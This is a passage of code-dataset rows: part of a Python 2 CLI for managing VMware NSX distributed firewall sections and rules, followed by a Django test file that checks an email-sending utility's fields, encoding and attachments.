for servicegroupdict in servicegrouplist:
if str(servicegroupdict['name']) == rule_service_name:
rule_schema['rule']['services']['service']['value'] = str(servicegroupdict['objectId'])
if rule_schema['rule']['services']['service']['value'] == '':
print ('Invalid service specified')
return
try:
rule = client_session.create(rule_type, uri_parameters={'sectionId': section_id}, request_body_dict=rule_schema,
additional_headers={'If-match': section_etag})
return rule
except:
print("")
print 'Error: cannot create rule. It is possible that some of the parameters are not compatible. Please check' \
'the following rules are obeyed:'
print'(*) If the rule is applied to all edge gateways, then "inout" is the only allowed value for parameter -dir'
print'(*) Allowed values for -pktype parameter are any/ipv6/ipv4'
print'(*) For a L3 rules applied to all edge gateways "any" is the only allowed value for parameter -pktype'
print'(*) For a L2 rule "any" is the only allowed value for parameter -pktype'
print'(*) For a L3 rule allowed values for -action parameter are allow/block/reject'
print'(*) For a L2 rule allowed values for -action parameter are allow/block'
print("")
print'Aborting. No action have been performed on the system'
print("")
print("Printing current DFW rule schema used in API call")
print("-------------------------------------------------")
print rule_schema
return
def _dfw_rule_create_print(client_session, vccontent, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
section_id = kwargs['dfw_section_id']
if not (kwargs['dfw_rule_name']):
print ('Mandatory parameters missing: [-rname RULE NAME]')
return None
rule_name = kwargs['dfw_rule_name']
if not (kwargs['dfw_rule_applyto']):
print ('Mandatory parameters missing: [-appto RULE APPLYTO VALUE ( ex: "any","dfw","edgegw" or object-id )]')
return None
if kwargs['dfw_rule_applyto'] == 'any':
rule_applyto = 'ANY'
elif kwargs['dfw_rule_applyto'] == 'dfw':
rule_applyto = 'DISTRIBUTED_FIREWALL'
elif kwargs['dfw_rule_applyto'] == 'edgegw':
rule_applyto = 'ALL_EDGES'
else:
rule_applyto = kwargs['dfw_rule_applyto']
if not (kwargs['dfw_rule_direction']):
print ('Mandatory parameters missing: [-dir RULE DIRECTION ("inout","in","out")]')
return None
if rule_applyto != 'ALL_EDGES' \
and ((kwargs['dfw_rule_direction']) == 'inout' or (kwargs['dfw_rule_direction']) == 'in' or
(kwargs['dfw_rule_direction']) == 'out'):
rule_direction = kwargs['dfw_rule_direction']
elif rule_applyto == 'ALL_EDGES' and (kwargs['dfw_rule_direction']) == 'inout':
rule_direction = kwargs['dfw_rule_direction']
else:
print ('Allowed values for -dir parameter are inout/in/out')
print('If the rule is applied to all edge gateways, then "inout" is the only allowed value for parameter -dir')
return None
if not (kwargs['dfw_rule_pktype']):
print ('Mandatory parameters missing: [-pktype RULE PACKET TYPE ("any","ipv6","ipv4"]')
return None
if rule_applyto != 'ALL_EDGES' \
and ((kwargs['dfw_rule_pktype']) == 'any' or (kwargs['dfw_rule_pktype']) == 'ipv4' or
(kwargs['dfw_rule_pktype']) == 'ipv6'):
rule_pktype = kwargs['dfw_rule_pktype']
elif rule_applyto == 'ALL_EDGES' and (kwargs['dfw_rule_pktype']) == 'any':
rule_pktype = kwargs['dfw_rule_pktype']
else:
print ('Allowed values for -pktype parameter are any/ipv6/ipv4')
print ('For a L3 rules applied to all edge gateways "any" is the only allowed value for parameter -pktype')
print ('For a L2 rule "any" is the only allowed value for parameter -pktype')
return None
if not (kwargs['dfw_rule_disabled']):
print ('Using default value "false" for rule "disabled" attribute')
rule_disabled = 'false'
elif (kwargs['dfw_rule_disabled']) == 'false' or (kwargs['dfw_rule_disabled']) == 'true':
rule_disabled = kwargs['dfw_rule_disabled']
else:
print ('Allowed values for -disabled parameter are true/false')
return None
if not (kwargs['dfw_rule_action']):
print ('Using default value "allow" for rule "action" attribute')
rule_action = 'allow'
elif (kwargs['dfw_rule_action']) == 'allow' or (kwargs['dfw_rule_action']) == 'block' \
or (kwargs['dfw_rule_action']) == 'reject':
rule_action = kwargs['dfw_rule_action']
else:
print ('For a L3 rule allowed values for -action parameter are allow/block/reject')
print ('For a L2 rule allowed values for -action parameter are allow/block')
return None
if not (kwargs['dfw_rule_source_type']):
print ('Using default value "Ipv4Address" for rule source "type" attribute')
rule_source_type = 'Ipv4Address'
else:
rule_source_type = kwargs['dfw_rule_source_type']
if not (kwargs['dfw_rule_source_value']):
rule_source_value = ''
else:
rule_source_value = kwargs['dfw_rule_source_value']
if not (kwargs['dfw_rule_source_name']):
rule_source_name = ''
else:
rule_source_name = kwargs['dfw_rule_source_name']
if rule_source_value == '' and rule_source_name == '':
print ('Either rule source parameter "value" or rule source parameter "name" must be defined')
return
if not (kwargs['dfw_rule_source_excluded']):
print ('Using default value "false" for rule source "excluded" attribute')
rule_source_excluded = 'false'
elif (kwargs['dfw_rule_source_excluded']) != 'true' or (kwargs['dfw_rule_source_excluded']) != 'false':
print ('Allowed values for rule source excluded parameter are "true" and "false"')
return
else:
rule_source_excluded = kwargs['dfw_rule_source_excluded']
if not (kwargs['dfw_rule_destination_type']):
print ('Using default value "Ipv4Address" for rule destination "type" attribute')
rule_destination_type = 'Ipv4Address'
else:
rule_destination_type = kwargs['dfw_rule_destination_type']
if not (kwargs['dfw_rule_destination_name']):
rule_destination_name = ''
else:
rule_destination_name = kwargs['dfw_rule_destination_name']
if not (kwargs['dfw_rule_destination_value']):
rule_destination_value = ''
else:
rule_destination_value = kwargs['dfw_rule_destination_value']
if rule_destination_value == '' and rule_destination_name == '':
print ('Either rule destination parameter "value" or rule destination parameter "name" must be defined')
return
if not (kwargs['dfw_rule_destination_excluded']):
print ('Using default value "false" for rule destination "excluded" attribute')
rule_destination_excluded = 'false'
elif (kwargs['dfw_rule_destination_excluded']) != 'true' and (kwargs['dfw_rule_destination_excluded']) != 'false':
print ('Allowed values for rule destination excluded parameter are "true" and "false"')
return
else:
rule_destination_excluded = kwargs['dfw_rule_destination_excluded']
if not (kwargs['dfw_rule_service_protocolname']):
rule_service_protocolname = ''
else:
rule_service_protocolname = kwargs['dfw_rule_service_protocolname']
if not (kwargs['dfw_rule_service_destport']):
rule_service_destport = ''
else:
rule_service_destport = kwargs['dfw_rule_service_destport']
if not (kwargs['dfw_rule_service_srcport']):
rule_service_srcport = ''
else:
rule_service_srcport = kwargs['dfw_rule_service_srcport']
if not (kwargs['dfw_rule_service_name']):
rule_service_name = ''
else:
rule_service_name = kwargs['dfw_rule_service_name']
if (rule_service_protocolname == '') and (rule_service_destport != ''):
print ('Protocol name must be specified in the rule service parameter if a destination port is specified')
return
if (rule_service_protocolname != '') and (rule_service_destport != '') and (rule_service_name != ''):
print ('Rule service can be specified by either protocol/port or service name, but not both')
return
if rule_applyto != 'ALL_EDGES':
if not (kwargs['dfw_rule_tag']):
rule_tag = ''
else:
rule_tag = kwargs['dfw_rule_tag']
elif rule_applyto == 'ALL_EDGES':
# If appliedTo is 'ALL_EDGES' no tags are allowed
rule_tag = ''
else:
rule_tag = ''
if not (kwargs['dfw_rule_note']):
rule_note = ''
else:
rule_note = kwargs['dfw_rule_note']
if not (kwargs['dfw_rule_logged']):
print ('Using default value "false" for rule "logging" attribute')
rule_logged = 'false'
else:
if kwargs['dfw_rule_logged'] == 'true' or kwargs['dfw_rule_logged'] == 'false':
rule_logged = kwargs['dfw_rule_logged']
else:
print ('Allowed values for rule logging are "true" and "false"')
return
#rule = dfw_rule_create(client_session, vccontent, section_id, rule_name, rule_direction, rule_pktype, rule_disabled,
#rule_action, rule_applyto, rule_source_type, rule_source_name, rule_source_value,
#rule_source_excluded, rule_destination_type, rule_destination_name, rule_destination_value,
#rule_destination_excluded, rule_service_protocolname, rule_service_destport,
#rule_service_srcport, rule_service_name, rule_note, rule_tag, rule_logged)
rule = dfw_rule_create(client_session, section_id, rule_name, rule_source_value, rule_destination_value,
rule_direction, rule_pktype, rule_applyto, rule_disabled, rule_action, rule_source_type,
rule_destination_type, rule_source_excluded,rule_destination_excluded, rule_logged,
rule_source_name, rule_destination_name, rule_service_protocolname, rule_service_destport,
rule_service_srcport, rule_service_name, rule_note, rule_tag, vccontent)
if kwargs['verbose']:
print rule
else:
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
print ''
print '*** ETHERNET RULES ***'
print tabulate(l2_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
print ''
print '*** LAYER 3 RULES ***'
print tabulate(l3_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_service_delete(client_session, rule_id, service):
"""
This function delete one of the services of a dfw rule given the rule id and the service to be deleted.
If two or more services have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param service: The service of the dfw rule to be deleted. If the service name contains any space, then
it must be enclosed in double quotes (like "VM Network"). For TCP/UDP services the syntax is as
follows: Proto:SourcePort:DestinationPort ( example TCP:9090:any )
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
- ( verbose option ) a list containing a list with the following dfw rule informations after the deletion
process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action - Direction-
Pktytpe- AppliedTo- ID(section)
"""
service = str(service).split(':', 3)
if len(service) == 1:
service.append('')
if len(service) == 2:
service.append('')
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", "---", service, "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'services' not in rule_schema.items()[1][1]['rule']:
# It means the only service is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['services']['service']) == list:
# It means there are more than one services, each one with his own dict
service_list = rule_schema.items()[1][1]['rule']['services']['service']
for i, val in enumerate(service_list):
if ('name' in val and val['name'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val and
val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val and
val['protocolName'] == service[0]):
del rule_schema.items()[1][1]['rule']['services']['service'][i]
# The order dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['services']['service']) == dict:
# It means there is just one explicit service with his dict
service_dict = rule_schema.items()[1][1]['rule']['services']['service']
val = service_dict
if ('name' in val and val['name'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val and
val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val and
val['protocolName'] == service[0]):
del rule_schema.items()[1][1]['rule']['services']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_service_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_service']):
print ('Mandatory parameters missing: [-srv RULE SERVICE]')
return None
rule_id = kwargs['dfw_rule_id']
service = kwargs['dfw_rule_service']
rule = dfw_rule_service_delete(client_session, rule_id, service)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_applyto_delete(client_session, rule_id, applyto):
"""
This function delete one of the applyto clauses of a dfw rule given the rule id and the clause to be deleted.
If two or more clauses have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param applyto: The name of the applyto clause of the dfw rule to be deleted. If it contains any space, then
it must be enclosed in double quotes (like "VM Network").
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
- ( verbose option ) a list containing a list with the following dfw rule information after the deletion
process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action - Direction-
Pktytpe- AppliedTo- ID(section)
"""
apply_to = str(applyto)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", "---", "---", "---", "---", "---", apply_to, "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if type(rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']) == list:
# It means there are more than one applyto clauses, each one with his own dict
applyto_list = rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']
for i, val in enumerate(applyto_list):
if 'name' in val and val['name'] == apply_to:
del rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo'][i]
# The order dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']) == dict:
# It means there is just one explicit applyto clause with his dict
applyto_dict = rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']
val = applyto_dict
if 'name' in val and val['name'] == "DISTRIBUTED_FIREWALL":
# It means the only applyto clause is "DISTRIBUTED_FIREWALL" and it cannot be deleted short of deleting
# the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if 'name' in val and val['name'] == apply_to:
del rule_schema.items()[1][1]['rule']['appliedToList']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_applyto_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_applyto']):
print ('Mandatory parameters missing: [-appto RULE APPLYTO]')
return None
rule_id = kwargs['dfw_rule_id']
applyto = kwargs['dfw_rule_applyto']
rule = dfw_rule_applyto_delete(client_session, rule_id, applyto)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_section_read(client_session, dfw_section_id):
"""
This function retrieves details of a dfw section given its id
:param client_session: An instance of an NsxClient Session
:param dfw_section_id: The ID of the dfw section to retrieve details from
:return: returns
- a tabular view of the section with the following information: Name, Section id, Section type, Etag
- ( verbose option ) a dictionary containing all sections's details
"""
section_list = []
dfw_section_id = str(dfw_section_id)
uri_parameters = {'sectionId': dfw_section_id}
dfwL3_section_details = dict(client_session.read('dfwL3SectionId', uri_parameters))
section_name = dfwL3_section_details['body']['section']['@name']
section_id = dfwL3_section_details['body']['section']['@id']
section_type = dfwL3_section_details['body']['section']['@type']
section_etag = dfwL3_section_details['Etag']
section_list.append((section_name, section_id, section_type, section_etag))
return section_list, dfwL3_section_details
def _dfw_section_read_print(client_session, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
dfw_section_id = kwargs['dfw_section_id']
section_list, dfwL3_section_details = dfw_section_read(client_session, dfw_section_id)
if kwargs['verbose']:
print dfwL3_section_details['body']
else:
print tabulate(section_list, headers=["Name", "ID", "Type", "Etag"], tablefmt="psql")
def dfw_section_create(client_session, dfw_section_name, dfw_section_type):
"""
This function creates a new dfw section given its name and its type
The new section is created on top of all other existing sections and with no rules
If a section of the same time and with the same name already exist, nothing is done
:param client_session: An instance of an NsxClient Session
:param dfw_section_name: The name of the dfw section to be created
:param dfw_section_type: The type of the section. Allowed values are L2/L3/L3R
:return: returns
- a tabular view of all the sections of the same type of the one just created. The table contains the
following information: Name, Section id, Section type
- ( verbose option ) a dictionary containing for each possible type all sections' details, including
dfw rules
"""
dfw_section_name = str(dfw_section_name)
dfw_section_selector = str(dfw_section_type)
if dfw_section_selector != 'L2' and dfw_section_selector != 'L3' and dfw_section_selector != 'L3R':
print ('Section Type Unknown - Allowed values are L2/L3/L3R -- Aborting')
return
if dfw_section_selector == 'L2':
dfw_section_type = 'dfwL2Section'
elif dfw_section_selector == 'L3':
dfw_section_type = 'dfwL3Section'
else:
dfw_section_type = 'layer3RedirectSections'
# Regardless of the final rule type this line below is the correct way to get the empty schema
section_schema = client_session.extract_resource_body_example('dfwL3Section', 'create')
section_schema['section']['@name'] = dfw_section_name
# Delete the rule section to create an empty section
del section_schema['section']['rule']
# Check for duplicate sections of the same type as the one that will be created, create and return
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
if dfw_section_type == 'dfwL2Section':
for val in l2_section_list:
if dfw_section_name in val:
# Section with the same name already exist
return l2_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l2_section_list, detailed_dfw_sections
if dfw_section_type == 'dfwL3Section':
for val in l3_section_list:
if dfw_section_name in val:
# Section with the same name already exist
return l3_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l3_section_list, detailed_dfw_sections
if dfw_section_type == 'layer3RedirectSections':
for val in l3r_section_list:
if dfw_section_name in val:
# Section with the same name already exist
return l3r_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l3r_section_list, detailed_dfw_sections
def _dfw_section_create_print(client_session, **kwargs):
if not (kwargs['dfw_section_name']):
print ('Mandatory parameters missing: [-sname SECTION NAME]')
return None
if not (kwargs['dfw_section_type']):
print ('Mandatory parameters missing: [-stype SECTION TYPE] - Allowed values are L2/L3/L3R -- Aborting')
return None
if kwargs['dfw_section_type'] != 'L3' and kwargs['dfw_section_type'] != 'L2' and kwargs['dfw_section_type'] != 'L3R':
print ('Incorrect parameter: [-stype SECTION TYPE] - Allowed values are L2/L3/L3R -- Aborting')
return None
dfw_section_name = kwargs['dfw_section_name']
dfw_section_type = kwargs['dfw_section_type']
section_list, detailed_dfw_sections = dfw_section_create(client_session, dfw_section_name, dfw_section_type)
if kwargs['verbose']:
print detailed_dfw_sections
else:
print tabulate(section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
def contruct_parser(subparsers):
parser = subparsers.add_parser('dfw', description="Functions for distributed firewall",
help="Functions for distributed firewall",
formatter_class=RawTextHelpFormatter)
parser.add_argument("command", help="""
list_sections: return a list of all distributed firewall's sections
read_section: return the details of a dfw section given its id
read_section_id: return the id of a section given its name (case sensitive)
create_section: create a new section given its name and its type (L2,L3,L3R)
delete_section: delete a section given its id
list_rules: return a list of all distributed firewall's rules
read_rule: return the details of a dfw rule given its id
read_rule_id: return the id of a rule given its name and the id of the section to which it belongs
create_rule: create a new rule given the id of the section, the rule name and all the rule parameters
delete_rule: delete a rule given its id
delete_rule_source: delete one rule's source given the rule id and the source identifier
delete_rule_destination: delete one rule's destination given the rule id and the destination identifier
delete_rule_service: delete one rule's service given the rule id and the service identifier
delete_rule_applyto: delete one rule's applyto clause given the rule id and the applyto clause identifier
move_rule_above: move one rule above another rule given the id of the rule to be moved and the id of the base rule
""")
parser.add_argument("-sid",
"--dfw_section_id",
help="dfw section id needed for create, read and delete operations")
parser.add_argument("-rid",
"--dfw_rule_id",
help="dfw rule id needed for create, read and delete operations")
parser.add_argument("-sname",
"--dfw_section_name",
help="dfw section name")
parser.add_argument("-rname",
"--dfw_rule_name",
help="dfw rule name")
parser.add_argument("-dir",
"--dfw_rule_direction",
help="dfw rule direction")
parser.add_argument("-pktype",
"--dfw_rule_pktype",
help="dfw rule packet type")
parser.add_argument("-disabled",
"--dfw_rule_disabled",
help="dfw rule disabled")
parser.add_argument("-action",
"--dfw_rule_action",
help="dfw rule action")
parser.add_argument("-src",
"--dfw_rule_source",
help="dfw rule source")
parser.add_argument("-srctype",
"--dfw_rule_source_type",
help="dfw rule source type")
parser.add_argument("-srcname",
"--dfw_rule_source_name",
help="dfw rule source name")
parser.add_argument("-srcvalue",
"--dfw_rule_source_value",
help="dfw rule source value")
parser.add_argument("-srcexcluded",
"--dfw_rule_source_excluded",
help="dfw rule source excluded")
parser.add_argument("-dst",
"--dfw_rule_destination",
help="dfw rule destination")
parser.add_argument("-dsttype",
"--dfw_rule_destination_type",
help="dfw rule destination type")
parser.add_argument("-dstname",
"--dfw_rule_destination_name",
help="dfw rule destination name")
parser.add_argument("-dstvalue",
"--dfw_rule_destination_value",
help="dfw rule destination value")
parser.add_argument("-dstexcluded",
"--dfw_rule_destination_excluded",
help="dfw rule destination excluded")
parser.add_argument("-srv",
"--dfw_rule_service",
help="dfw rule service")
parser.add_argument("-srvprotoname",
"--dfw_rule_service_protocolname",
help="dfw rule service protocol name")
parser.add_argument("-srvdestport",
"--dfw_rule_service_destport",
help="dfw rule service destination port")
parser.add_argument("-srvsrcport",
"--dfw_rule_service_srcport",
help="dfw rule service source port")
parser.add_argument("-srvname",
"--dfw_rule_service_name",
help="dfw rule service name")
parser.add_argument("-appto",
"--dfw_rule_applyto",
help="dfw rule applyto")
parser.add_argument("-note",
"--dfw_rule_note",
help="dfw rule note")
parser.add_argument("-tag",
"--dfw_rule_tag",
help="dfw rule tag")
parser.add_argument("-logged",
"--dfw_rule_logged",
help="dfw rule logged")
parser.add_argument("-brid",
"--dfw_rule_base_id",
help="dfw rule base id")
parser.add_argument("-stype",
"--dfw_section_type",
help="dfw section type")
parser.set_defaults(func=_dfw_main)
def _dfw_main(args):
if args.debug:
debug = True
else:
debug = False
config = ConfigParser.ConfigParser()
assert config.read(args.ini), 'could not read config file {}'.format(args.ini)
try:
nsxramlfile = config.get('nsxraml', 'nsxraml_file')
except (ConfigParser.NoSectionError):
nsxramlfile_dir = resource_filename(__name__, 'api_spec')
nsxramlfile = '{}/nsxvapi.raml'.format(nsxramlfile_dir)
client_session = NsxClient(nsxramlfile, config.get('nsxv', 'nsx_manager'),
config.get('nsxv', 'nsx_username'), config.get('nsxv', 'nsx_password'), debug=debug)
vccontent = connect_to_vc(config.get('vcenter', 'vcenter'), config.get('vcenter', 'vcenter_user'),
config.get('vcenter', 'vcenter_passwd'))
try:
command_selector = {
'list_sections': _dfw_section_list_print,
'read_section': _dfw_section_read_print,
'list_rules': _dfw_rule_list_print,
'read_rule': _dfw_rule_read_print,
'read_section_id': _dfw_section_id_read_print,
'read_rule_id': _dfw_rule_id_read_print,
'delete_section': _dfw_section_delete_print,
'delete_rule': _dfw_rule_delete_print,
'delete_rule_source': _dfw_rule_source_delete_print,
'delete_rule_destination': _dfw_rule_destination_delete_print,
'delete_rule_service': _dfw_rule_service_delete_print,
'delete_rule_applyto': _dfw_rule_applyto_delete_print,
'create_section': _dfw_section_create_print,
'create_rule': _dfw_rule_create_print,
}
command_selector[args.command](client_session, vccontent=vccontent, verbose=args.verbose,
dfw_section_id=args.dfw_section_id,
dfw_rule_id=args.dfw_rule_id, dfw_section_name=args.dfw_section_name,
dfw_rule_name=args.dfw_rule_name, dfw_rule_source=args.dfw_rule_source,
dfw_rule_destination=args.dfw_rule_destination,
dfw_rule_service=args.dfw_rule_service, dfw_rule_applyto=args.dfw_rule_applyto,
dfw_rule_base_id=args.dfw_rule_base_id, dfw_section_type=args.dfw_section_type,
dfw_rule_direction=args.dfw_rule_direction, dfw_rule_pktype=args.dfw_rule_pktype,
dfw_rule_disabled=args.dfw_rule_disabled, dfw_rule_action=args.dfw_rule_action,
dfw_rule_source_type=args.dfw_rule_source_type,
dfw_rule_source_name=args.dfw_rule_source_name,
dfw_rule_source_value=args.dfw_rule_source_value,
dfw_rule_source_excluded=args.dfw_rule_source_excluded,
dfw_rule_destination_type=args.dfw_rule_destination_type,
dfw_rule_destination_name=args.dfw_rule_destination_name,
dfw_rule_destination_value=args.dfw_rule_destination_value,
dfw_rule_destination_excluded=args.dfw_rule_destination_excluded,
dfw_rule_service_protocolname=args.dfw_rule_service_protocolname,
dfw_rule_service_destport=args.dfw_rule_service_destport,
dfw_rule_service_srcport=args.dfw_rule_service_srcport,
dfw_rule_service_name=args.dfw_rule_service_name,
dfw_rule_tag=args.dfw_rule_tag, dfw_rule_note=args.dfw_rule_note,
dfw_rule_logged=args.dfw_rule_logged,)
except KeyError as e:
print('Unknown command {}'.format(e))
def main():
main_parser = argparse.ArgumentParser()
subparsers = main_parser.add_subparsers()
contruct_parser(subparsers)
args = main_parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
| 48.930612 | 122 | 0.631894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34,323 | 0.408963 |
9e9f896246ab8606b9ddf1a41403635bb424c413 | 2,463 | py | Python | src/myapp/tests/test_utils.py | thinkAmi/DjangoCongress_JP_2019_talk | 0b746f62808d979c1570de80084686f709996e1d | [
"Unlicense"
]
| 1 | 2019-05-18T04:34:59.000Z | 2019-05-18T04:34:59.000Z | src/myapp/tests/test_utils.py | thinkAmi/DjangoCongress_JP_2019_talk | 0b746f62808d979c1570de80084686f709996e1d | [
"Unlicense"
]
| null | null | null | src/myapp/tests/test_utils.py | thinkAmi/DjangoCongress_JP_2019_talk | 0b746f62808d979c1570de80084686f709996e1d | [
"Unlicense"
]
| null | null | null | import pathlib
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMessage
from django.test import TestCase
class TestSendMail(TestCase):
def _callFUT(self, encoding='utf-8', has_attachment=False):
from myapp.utils import my_send_mail
my_send_mail(encoding=encoding, has_attachment=has_attachment)
def test_send_multiple(self):
# 実行前はメールボックスに何もない
self.assertEqual(len(mail.outbox), 0)
# 1回実行すると、メールが1通入る
self._callFUT()
self.assertEqual(len(mail.outbox), 1)
# もう1回実行すると、メールが2通入る
self._callFUT()
self.assertEqual(len(mail.outbox), 2)
def test_types(self):
self._callFUT()
# list(EmailMessage(), ...) な型
self.assertTrue(isinstance(mail.outbox, list))
self.assertTrue(isinstance(mail.outbox[0], EmailMessage))
def test_mail_fields(self):
self._callFUT()
actual = mail.outbox[0]
self.assertEqual(actual.subject, '件名')
self.assertEqual(actual.body, '本文')
self.assertEqual(actual.from_email, '差出人 <[email protected]>')
# 宛先系はlistとして設定
self.assertEqual(actual.to,
['送信先1 <[email protected]>',
'送信先2 <[email protected]>'],)
self.assertEqual(actual.cc, ['シーシー <[email protected]>'])
self.assertEqual(actual.bcc, ['ビーシーシー <[email protected]>'])
self.assertEqual(actual.reply_to, ['返信先 <[email protected]>'])
# 追加ヘッダも含まれること
self.assertEqual(actual.extra_headers['Sender'], '[email protected]')
def test_encoding_of_iso2022jp(self):
self._callFUT(encoding='iso-2022-jp')
actual = mail.outbox[0]
# EmailMessageには、utf-8で格納されている
self.assertEqual(actual.subject, '件名')
def test_attachment(self):
self._callFUT(has_attachment=True)
actual = mail.outbox[0]
self.assertTrue(isinstance(actual.attachments, list))
# (filename, content, mimetype) なtuple
self.assertTrue(isinstance(actual.attachments[0], tuple))
# 添付ファイルの中身の型はbytes
self.assertTrue(isinstance(actual.attachments[0][1], bytes))
# 添付ファイル自体を検証
img = pathlib.Path(settings.STATICFILES_DIRS[0]).joinpath(
'images', 'shinanogold.png')
with img.open('rb') as f:
expected_img = f.read()
self.assertEqual(actual.attachments[0][1], expected_img)
| 32.84 | 78 | 0.639464 | 2,571 | 0.942794 | 0 | 0 | 0 | 0 | 0 | 0 | 714 | 0.261826 |
